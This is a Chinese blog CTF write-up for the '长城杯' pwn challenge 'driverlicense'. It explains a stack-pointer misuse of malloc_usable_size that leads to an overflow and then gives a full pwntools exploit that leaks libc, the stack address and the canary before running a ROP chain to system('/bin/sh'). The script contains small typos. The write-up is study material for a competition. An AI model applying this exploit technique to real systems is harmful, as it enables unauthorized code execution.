长城杯-pwn-driverlicense

最新推荐文章于 2024-07-15 15:17:48 发布
最新推荐文章于 2024-07-15 15:17:48 发布
阅读量65 收藏
点赞数
文章标签: 网络安全 c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/130578859
版权

长城杯-pwn-driverlicense

第一次打线下 收获颇丰 来复现一下题目

惯例我们下来checksec一下

请添加图片描述

开启了Canary和NX保护的64位程序

放进ida64里看看

去除了符号表的c++程序(说实在的看的非常头疼

由于程序实在太复杂这里就不贴了

我们可以发现程序要求输入name,age,comment

然后可以修改comment或输出信息

那么首先我们按照他的模式输入数据 需要注意的是我们输入comment时要将七输入到栈上而不能将其输入到堆上(在栈上我们就可以利用malloc_usable_size来造成溢出了)

现在查看在声明 std:string 之后的代码,根据手册页,一个名为 MALLOC_USABLE_SIZE 的函数说它从中获取内存块的大小,但是如果我们没有从堆栈传递指针会发生什么?意外会发生,此函数将返回 -8 (0xfffffffffffffff8),此值不会被解释为数,而是解释为非常高的数字,因为变量被声明为无符号整数,稍后将传递给 getn 函数的停止循环条件,进入无限循环,只有在找到新行 (0xa) 时才会停止,这将导致缓冲区溢出。

我们就可以利用溢出来将栈上的name修改为我们希望的地址进而达成泄露地址的目的

然后我们将存储指向name的指针的值改为read_got然后通过show来泄露read_got进而泄露libc_base

接着我们再次利用溢出来将栈上的name修改为_environ的地址进而达成泄露栈地址的目的

_environ中存储的参数是环境变量是存储在栈上的

从做题的角度来讲_environ是连接libc和栈的桥梁

我们可以在gdb中通过search _environ来查找到environ中存储的地址

然后用同样的方法我们可以泄露canary

由于main函数最后会析构栈上的内容 因此我们要保证析构的内容的不变

请添加图片描述

同时由于开启了canary因此要将canary也填进去

然后就是构造我们的ROP链了 我们希望执行system("/bin/sh")这个函数实际上有三个参数 第一个是/bin/sh后两个参数为0 由于我执行时发现只改rdi不太行所以要把rsi也改为0

构建我们的payload

one_adr = stack_adr - 312
two_adr = stack_adr - 24
system_addr = libcbase + libc.sym["system"]
bin_sh = next(libc.search(b"/bin/sh"))+ libcbase
payload = b'a'*16 + p64(one_adr)+b'a'*32+p64(canary) + b'a'*24 +
p64(pop_rdi_ret)+p64(bin_sh)+p64(pop_rsi_r15_ret)+p64(0)*2+p64(system_addr)

exp:

from pwn import*
# context.log_level = "debug"
context.arch="amd64"
binary_name = "driverlicense"
elf =ELF("./"+binary_name)
local = 1
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
se = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
rc = lambda num :io.recv(num)
rl = lambda :io.recvline()
ru = lambda delims :io.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, b'\x00'))
uu64 = lambda data :
info = lambda tag, addr :log.info(tag + " -------------> " +
hex(addr))
ia = lambda :io.interactive()
if local==0:
io = remote()
else:
io = process("./"+binary_name)
def edit(val):
sla(b'>>',b'1')
sla(b'>>',val)
def show():
io.sendlineafter(b'>>',b'2')


io.sendlineafter(b'>>',b'AIruo')
io.sendlineafter(b'>>',b'20')
io.sendlineafter(b'>>',b'xxx')


pop_rdi_ret = 0x0000000000401713
read_got = elf.got["read"]
pop_rsi_r15_ret = 0x0000000000401711
payload = b'a'*16 + p64(read_got)



edit(payload)
show()
io.recvuntil(b"Your name : ")
read_adr = u64((io.recv(6)).ljust(8, b'\x00'))
libcbase = read_adr - libc.sym["read"]
info("libcbase",libcbase)
system_addr = libcbase + libc.sym["system"]
bin_sh = next(libc.search(b"/bin/sh"))+ libcbase
environ = libcbase + libc.sym["_environ"]
payload = b'a'*16 + p64(environ)


edit(payload)
show()
io.recvuntil(b"Your name : ")
stack_adr = u64(io.recv(6).ljust(8, b'\x00'))
info("stack_adr",stack_adr)
one_adr = stack_adr - 312
two_adr = stack_adr - 24

#此处的one_addr和two_addr分别指的是什么

payload = b'a'*16 + p64(stack_adr - 288)
edit(payload)
show()
ru(b"Your name : ")
canary = u64((io.recv(8)).ljust(8, b'\x00'))
info("canary",canary)
payload = b'a'*16 + p64(one_adr)+b'a'*32+p64(canary) + b'a'*24 +
p64(pop_rdi_ret)+p64(bin_sh)+p64(pop_rsi_r15_ret)+p64(0)*2+p64(system_addr)

edit(payload)
io.sendlineafter(b'>>',b'0')
i0.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Lctf-2016-pwn100 题解
lifanxin的博客
12-24 784
Write Up知识点和关键字样本运行静态分析程序逻辑求解脚本 知识点和关键字 栈溢出 ROP 无libc泄露函数地址 样本 来自Lctf 2016年的pwn题,样本 pwn100 (这个资源没办法上传,想要样本的可以留言!) 运行 查看文件属性   64位程序,只开了NX保护 运行样本程序 输入超过200个字符串才会回显"bye~",接着报了一个段错误,程序结束 静态分析 把程序拖进到IDA查看,发现main函数比较简单,主要起作用的是sub_40068E()函数,我们直接进入到这个函数。 该函数又
长城杯2021 pwn
清霂的博客
09-20 790
长城杯20211.K1ng_in_h3Ap_I2.K1ng_in_h3Ap_II 菜鸡第一次在国内比赛做出两道题,害,长城杯比第五空间温柔多了,第五空间一道rop,之后就直接vm,musl都没学过,还有个c++逆向8出来。打完国赛(写了一道简单堆题,orw调一晚上没出来,服了)之后划水时间太长了,8月下旬才开始继续学堆,争取10月底前把vm,musl,mips,arm这种其他架构(不知道算不算)的pwn学习一下。 1.K1ng_in_h3Ap_I 题目给了3个字节libc地址,操作性还是挺强的,借用残留指针
CTFshow-pwn入门-前置基础pwn26-pwn28
T1ngSh0w的博客
06-20 949
CTFshow-pwn入门-pwn26-pwn28
东华杯-pwn-cpp1
One_p_Two_w的博客
11-11 3024
东华杯-pwn-cpp1 前一阵子东华杯的pwn题,比赛时候没做出来,说起来那时候我才刚学到fastbin attack,天天在和libc2.23打交道,比赛的时候时候看见libc全是2.31的…孩子人都傻了,遂去misc划水。。。(r n m,退钱!) 现在终于看了tcache,寻思试一下之前的赛题,于是有了这篇博客,做起来发现,好像并没有那么难? 我本地的环境就是2.31的,所以就在本地尝试复现了一下,文件已经传到了网盘,想复现的师傅们可以在这里下载 分析 main函数如下 菜单 new new中允
解决MQTT-PWN docker安装404 Not Found问题
kudos123的博客
01-23 559
其他文章提示加命令还是一样报错404。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8338
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Linux C | 管道open打开方式
I_feige的博客
07-12 354
1.
c++ primer plus 第16章string 类和标准模板库,string 类输入
zhyjhacker的博客
07-14 1074
c++ primer plus 第16章string 类和标准模板库,string 类输入。
c++ 生成随机字符串
m0_56306892的博客
07-15 206
以下是一个示例代码,它使用std::random_device和std::mt19937生成随机字符,并将结果存储在一个字符串中。std::uniform_int_distribution<> distribution(0, max_index - 1) 创建一个均匀分布,以确保生成的随机数在字符集的索引范围内。输出随机字符串: 在主函数中调用generateRandomString生成一个长度为1024的随机字符串,并输出结果。std::random_device rd 用于生成一个随机种子。
C语言 2个日期相关的函数
waterHBO的博客
07-15 140
读代码的过程中,遇到2个日期相关的工具函数, 记录一下。比较日期,计算日期间隔(天数)
05day--C++日期类的实现与取地址运算符的重载
weixin_73863912的博客
07-13 468
• const实际修饰该成员函数隐含的this指针,表明在该成员函数中不能对类的任何成员进⾏修改。const 修饰Date类的Print成员函数,Print隐含的this指针由 Date* const this 变为 const Date* const this。• 将const修饰的成员函数称之为const成员函数,const修饰成员函数放到成员函数参数列表的后⾯。取地址运算符重载分为普通取地址运算符重载和const取地址运算符重载,⼀般这两个函数编译器⾃动。⽣成的就可以够我们⽤了,不需要去显⽰实现。
C++客户端Qt开发——QT初识
m0_63596031的博客
07-13 833
②中的代码创建,是在堆上new出来的一块空间,当把对象改成在栈上创建,此时就可以看到运行起来的程序无法显示出helloworld,此时label对象随着构造函数的结束,就销毁了,所以应该把它交给对象树进行管理。在QT Designer中创建一个控件的时候,此时会给这个控件分配一个objectName属性,这个属性的值,要求是在界面中是唯一的,不能和别人重复。Qt的对象树模型是一种递归的结构,其中一个对象可以拥有多个子对象,而每个子对象又可以拥有自己的子对象,以此类推。坐标体系:以左上角为原点(0,0),
JNI: 在Kotlin和C++之间通过JNI进行接口传递,两边参数定义映射
最新发布
tyfwin的博客
07-15 993
在Kotlin和C++之间通过JNI进行接口传递时,需要注意两边参数定义的映射关系。JNI(Java Native Interface)为Java(Kotlin也适用)与本地语言(如C/C++)之间的交互提供了桥梁。在Kotlin中定义的外部函数和C++中的实现需要通过JNI签名相互对应。
鸿蒙开发:Universal Keystore Kit(密钥管理服务)【密钥删除(C/C++)】
m0_70748845的博客
07-12 364
为保证数据安全性,当不需要使用该密钥时,应该删除密钥。
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值